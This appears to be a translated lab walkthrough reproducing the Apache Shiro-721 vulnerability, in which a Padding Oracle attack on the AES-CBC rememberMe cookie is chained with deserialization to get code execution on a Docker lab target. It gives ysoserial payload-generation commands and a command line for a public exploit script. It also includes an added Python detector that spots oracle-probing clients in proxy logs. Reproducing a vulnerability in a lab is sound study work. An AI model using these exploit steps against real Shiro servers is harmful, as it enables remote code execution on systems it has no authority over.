Shiro Historical Vulnerability Recurrence - Shiro-721

Vulnerability principle

Shiro rememberMe deserialization remote code execution vulnerability

Because the rememberMe field in the Apache Shiro cookie is encrypted in AES-128-CBC mode, a user can construct a malicious rememberMe field from attack code produced by a Padding Oracle attack on that encryption, then re-request the website to trigger a deserialization attack, ultimately achieving arbitrary code execution.

The rememberMe cookie is encrypted in AES-128-CBC mode and is vulnerable to Padding Oracle attacks. A deserialization attack can be performed by combining a valid rememberMe cookie as a prefix to a Padding Oracle attack, and then crafting the rememberMe.

Tip: After version 1.2.4, Shiro replaced AES-CBC with AES-GCM, so it is no longer possible to traverse keys through a Padding Oracle.

Affected version

Apache Shiro <= 1.4.1 (requires a valid login account; the attack is based on a Padding Oracle attack)

Reference link: https://www.jianshu.com/p/833582b2f560

Feature detection

Since exploiting the vulnerability requires a valid login account, we first log in normally with that account to obtain a valid rememberMe cookie and record its value.

Environment build

Docker basic operations

docker pull vulfocus/shiro-721

docker run -d -p 8080:8080 vulfocus/shiro-721

Visit the target-range address; the environment has been built successfully.

http://192.168.88.130:8080/login.jsp

Vulnerability recurrence

Log in with the correct username and password, tick rememberMe, proxy the request through Burp, and capture the returned rememberMe value.

If authentication succeeds, the deleteMe cookie is not set.

If authentication fails, the deleteMe cookie is set.

The deleteMe cookie:

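The deleteMe behaviour above is also the defender's detection handle: a Padding Oracle run produces hundreds of requests from one client that each present a tampered rememberMe cookie and get rememberMe=deleteMe back, whereas a normal user triggers that at most once for a stale cookie. The following is an added example, not code from the original post, that flags such clients over constructed reverse-proxy log lines; the log format, field layout and thresholds are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed log format (constructed, not from the post): a reverse proxy logging, per request,
# <iso8601> <client_ip> <method> <path> <status> <request_cookie_names> <response_set_cookie>
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) "
                     r"(?P<status>\d{3}) (?P<req_cookies>\S+) (?P<set_cookie>\S+)$")

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return rec

def is_oracle_probe(rec):
    """True when the request carried a rememberMe cookie and Shiro answered rememberMe=deleteMe.
    One such event is an expired or corrupt cookie; hundreds per client per minute is the oracle pattern."""
    return ("rememberMe" in rec["req_cookies"].split(";")
            and rec["set_cookie"].startswith("rememberMe=deleteMe"))

def find_padding_oracle_clients(lines, threshold=100, window_seconds=60):
    """Return {client_ip: peak deleteMe count} for clients exceeding threshold in a sliding window."""
    recent, flagged = defaultdict(deque), {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_oracle_probe(rec):
            continue
        q = recent[rec["client"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:  # drop events outside the window
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["client"]] = max(flagged.get(rec["client"], 0), len(q))
    return flagged

def build_sample_log():
    """Constructed sample: one normal session, one stale cookie, and one client driving the oracle."""
    lines = [
        "2023-01-01T10:00:00Z 10.0.0.5 GET /login.jsp 200 - -",
        "2023-01-01T10:00:02Z 10.0.0.5 GET /index.jsp 200 JSESSIONID;rememberMe -",
        "2023-01-01T10:00:03Z 10.0.0.7 GET /index.jsp 200 rememberMe rememberMe=deleteMe",
    ]
    start = datetime(2023, 1, 1, 10, 1, 0, tzinfo=timezone.utc)
    for i in range(300):  # 300 tampered-cookie requests spread over 60 seconds
        ts = start + timedelta(seconds=i // 5)
        lines.append(f"{ts:%Y-%m-%dT%H:%M:%SZ} 203.0.113.9 GET /index.jsp 200 rememberMe rememberMe=deleteMe")
    return lines
```

Running `find_padding_oracle_clients(build_sample_log())` flags only 203.0.113.9; the single stale-cookie event from 10.0.0.7 stays below the threshold.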

Use the ysoserial tool to generate the payload

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/1" > payload.class

# "touch /tmp/1" writes a file named 1 into the /tmp directory

Use the deleteMe cookie value captured in Burp just now as the prefix, load the payload, and run the Padding Oracle attack.

Script link: https://github.com/wuppp/shiro_rce_exp

python shiro_exp.py http://192.168.88.130:8080 [rememberMeCookie] payload.class

python2 shiro_exp.py http://192.168.88.130:8080 bVZT3bzgT/0t714w/WmYr3EP081Z0qO7gaUMGC90GK/R019JeYL+64UgucSB8COn6jlzV10THzZP0okwQ/Fs75d2XAvhepUV8RxgSWhFEWQLNq4nXw1ESgbiAQb9KyMd/nwgT9goYuMOERIbNA6Ay5AWRtuLvEaRmSTYPwxampXbnG2JlSXms45L6uqM2ek4X3y6ZSiZM80XbZUyXdOBP+EN8TuRhO+bS8N8jEWaj/uAtNZY8m94m11/SIPk1nBGfGzpcU3WIbT4R3feHaOkCHYLTuLxif1q6rItx5eICS5q8B4qVrTESf2XCFgaGp2FxlZ18AjpTOF4gwQ7cLEM7L49BhvxpAlj4w0GMOuyk27OKdUIh3+RK5qT7Dgp3fGWbEZrqyu6MCAG0TmKY2vKE1peLRNEAuQJapRU/FCVcSfSolxIMHSHb/WzBpcLehOC5Jslb5hekliouggjfNfTV6fSuvz1hLIfix2IiRwmiM/ns3xAVVsBwOc+1SxLqpt2 payload.class
Usage: shiro_exp.py <url> <somecookie value> <payload>

This step takes a long time.

The brute-forcing succeeds, and the forged rememberMe cookie value is returned.


Visit the target-range address again, capture the request with Burp, and add the rememberMe value brute-forced above.

Go to the target-range server and check whether a file named 1 has been created in the /tmp directory.

docker exec -it 035 /bin/bash

The exploit was successful!


Source: blog.csdn.net/weixin_44971640/article/details/128550973